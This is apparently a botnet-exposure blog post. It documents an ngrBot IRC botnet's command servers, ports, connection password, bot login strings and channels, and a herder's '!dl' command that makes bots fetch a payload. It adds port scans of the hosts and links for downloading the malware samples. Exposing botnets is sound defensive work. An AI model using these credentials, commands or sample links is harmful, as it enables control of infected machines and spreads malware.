Same hecker Burimi from here http://www.exposedbotnets.com/2012/03/217160224132irc-botnet-hosted-in.html
Resolved : [gigasphere.su] To [61.31.99.67]
Resolved : [gigasphere.su] To [82.165.135.196]
Resolved : [gigasphere.su] To [173.246.102.122]
Remote Host Port Number
61.31.99.67 4042 PASS ngrBot
61.31.99.67 1863 PASS ngrBot
other ports used for ircd:
81,3333,1234,33333
NICK new[USA|XP|COMPUTERNAME]eejxdfy
USER xd “” “lol” :xd
Channels:
Now talking in #boss
Topic On: [ #boss ] [ !mod usbi on !dl http://hotfile.com/dl/153572539/c0b3791/final.html ]
Topic By: [ burimi ]
ChanMode: irc.priv8net8.com sets mode [+q burimi]
(burimi) !dl http://hotfile.com/dl/153572539/c0b3791/final.html
Now talking in #US
Topic On: [ #US ] [ ]
Topic By: [ test ]
NICK n{US|XPa}suzkerl
USER suzkerl 0 0 :suzkerl
JOIN #DarkSons# ngrBot
Open ports :
Interesting ports on 61-31-99-67.static.tfn.net.tw (61.31.99.67):
Not shown: 1696 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp Sendmail 8.13.8/8.13.8
53/tcp open domain
80/tcp open http Apache httpd 2.2.3 ((CentOS))
81/tcp open irc Unreal ircd (Admin email you.are@a.stupid.mf)
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind
143/tcp open imap Dovecot imapd
487/tcp filtered saft
818/tcp open rpcbind
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
1234/tcp open hotline?
1720/tcp filtered H.323/Q.931
3306/tcp open mysql MySQL (unauthorized)
3333/tcp open irc Unreal ircd (Admin email you.are@a.stupid.mf)
10000/tcp open ssl/unknown
Interesting ports on s15432334.onlinehome-server.info (82.165.135.196):
Not shown: 1696 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3
22/tcp open ssh OpenSSH 4.3p2 (protocol 2.0)
25/tcp open smtp qmail smtpd
53/tcp open domain ISC BIND none
80/tcp open http Apache httpd
81/tcp open irc Unreal ircd (Admin email you.are@a.stupid.mf)
106/tcp open pop3pw poppassd
110/tcp open pop3 Courier pop3d
143/tcp open imap Courier Imapd (released 2004)
443/tcp open ssl/http Apache httpd
465/tcp open ssl/smtp qmail smtpd
587/tcp open smtp qmail smtpd
646/tcp filtered unknown
993/tcp open ssl/imap Courier Imapd (released 2004)
995/tcp open ssl/pop3 Courier pop3d
1234/tcp open irc Unreal ircd (Admin email you.are@a.stupid.mf)
1720/tcp filtered H.323/Q.931
3306/tcp open mysql MySQL 5.0.95
8443/tcp open ssl/unknown
credits to loadx for ip scans
Download samples here:
http://hotfile.com/dl/153572539/c0b3791/final.html
http://hotfile.com/dl/153540668/6dd8e3e/m.jpg.html
http://s326.hotfile.com/get/1dd0838f0764ce12d3b119e24f36395d47a3de10/4f931b3f/2/2a31a7e9d2ee973c/926d83c/m.jpg
http://s326.hotfile.com/get/a58484c3554ea090d061e366beaa8e1053996c30/4f931b64/2/2a31a7e9d2ee973c/926d83c/m.jpg
http://s18.hotfile.com/get/33d6f8e724609e7ccff17b2c5766b07ff2609a84/4f931b38/2/ba9c8ff02339cf34/92754bb/final
if links are removed post here and i m uploading them for u
hosting infos:
http://whois.domaintools.com/173.246.102.122